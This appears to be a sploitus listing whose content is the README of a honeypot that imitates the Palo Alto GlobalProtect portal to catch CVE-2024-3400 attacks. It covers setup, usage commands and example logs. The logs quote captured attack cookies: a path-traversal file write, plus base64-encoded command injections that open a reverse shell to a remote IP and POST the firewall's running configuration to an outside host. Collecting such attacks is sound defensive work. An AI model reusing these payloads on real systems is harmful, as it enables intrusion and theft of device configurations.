Exploit for Command Injection in Paloaltonetworks Pan-Os CVE-2024-3400

Name: Exploit for Command Injection in Paloaltonetworks Pan-Os CVE-2024-3400
Rating: 5 (139 reviews)
2024-04-24 | CVSS 7.5
## https://sploitus.com/exploit?id=E4213DDB-E340-52D1-8B87-AD82B52CE84B
# CVE-2024-3400-pot
Simple honeypot for CVE-2024-3400 Palo Alto PAN-OS Command Injection Vulnerability. 

# Features
* Simulate when visiting the `/global-protect/login.esp` (login page of the GlobalProtect Portal)
* Simulate HTTP request `POST /ssl-vpn/hipreport.esp` & `Cookie: SESSID=/../../../var/appweb/sslvpndocs/global-protect/portal/images/<file>;`
* Extract the filename from the cookie (if present)
* Save the content of the POST request to the file
* Simulate if user requested `GET /global-protect/portal/images/<file>`, user will receive `403` instead of `404`
* Collect IP & User-Agent of the request

# Prerequisites
* Python 3.x installed on your server.
* Python PIP
  * pip install flask
* Generate a self-signed certificate and private key with OpenSSL:
  ```
  $ openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365
    
    Enter PEM pass phrase:
    Verifying - Enter PEM pass phrase:
    -----
    You are about to be asked to enter information that will be incorporated
    into your certificate request.
    What you are about to enter is what is called a Distinguished Name or a DN.
    There are quite a few fields but you can leave some blank
    For some fields there will be a default value,
    If you enter '.', the field will be left blank.
    -----
    Country Name (2 letter code) [XX]:XX
    State or Province Name (full name) []:XX
    Locality Name (eg, city) [Default City]:
    Organization Name (eg, company) [Default Company Ltd]:XX
    Organizational Unit Name (eg, section) []:XX
    Common Name (eg, your name or your server's hostname) []:XX
    Email Address []:XX
  ```

  * Remove the Passphrase from the Private Key:
  ```
  $ openssl rsa -in key.pem -out key1.pem
  Enter pass phrase for key.pem:
  writing RSA key

  $ mv key1.pem key.pem
  ```

# Usage
To start the honeypot, run the following command:
```
sudo nohup python3 CVE-2024-3400-pot.py &
disown
```

* Check if the script is running or not:
```
sudo netstat -lnput | grep 443
tcp        0      0 0.0.0.0:443             0.0.0.0:*               LISTEN      1208/python3

sudo ps aux | grep <PID>
sonic        1208  0.0  3.5 189448 34364 pts/0    S    00:35   0:17 python3 CVE-2024-3400-pot.py
```

# Example Logs
```
INFO:werkzeug:WARNING: This is a development server. Do not use it in a production deployment. Use a production WSGI server instead.
 * Running on all addresses (0.0.0.0)
 * Running on https://127.0.0.1:443
 * Running on https://<IP>:443
INFO:werkzeug:Press CTRL+C to quit
INFO:root:Request from 45.61.138.35, User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36, Cookie: SESSID=/../../../var/appweb/sslvpndocs/global-protect/portal/images/rdpj22uy8h.txt;
WARNING:root:Detected suspicious file creation attempt: rdpj22uy8h.txt from 45.61.138.35
INFO:werkzeug:45.61.138.35 - - [23/Apr/2024 01:31:56] "POST /ssl-vpn/hipreport.esp HTTP/1.1" 200 -
WARNING:root:Suspicious file requested - rdpj22uy8h.txt from 45.61.138.35, User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36
INFO:werkzeug:45.61.138.35 - - [23/Apr/2024 01:31:56] "GET /global-protect/portal/images/rdpj22uy8h.txt HTTP/1.1" 403 -
WARNING:root:Suspicious file requested - rdpj22uy8h_test.txt from 45.61.138.35, User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36
INFO:root:Request from 158.255.213.74, User-Agent: python-requests/2.25.1, Cookie: SESSID=/../../../../opt/panlogs/tmp/device_telemetry/minute/test`echo${IFS}YmFzaCAtaSA+JiAvZGV2L3RjcC8xNTguMjU1LjIxMy43NC82MDU0NCAwPiYx|base64${IFS}-d|bash`
INFO:werkzeug:158.255.213.74 - - [23/Apr/2024 04:46:48] "POST /ssl-vpn/hipreport.esp HTTP/1.1" 200 -
INFO:root:Request from 92.119.159.68, User-Agent: curl/7.58.0, Cookie: SESSID=/../../../../opt/panlogs/tmp/device_telemetry/minute/aaba`echo${IFS}cHl0aG9uIC1jICdpbXBvcnQgb3M7IG9zLnBvcGVuKCJjdXJsIC1rIC1YIFBPU1QgLWQgQC9vcHQvcGFuY2ZnL21nbXQvc2F2ZWQtY29uZmlncy9ydW5uaW5nLWNvbmZpZy54bWwgaHR0cHM6Ly8xODUuMTA0LjE5NC40NzoxMDAwMiIpJw==|base64${IFS}-d|bash`
INFO:werkzeug:92.119.159.68 - - [24/Apr/2024 15:17:45] "POST /ssl-vpn/hipreport.esp HTTP/1.1" 200 -

```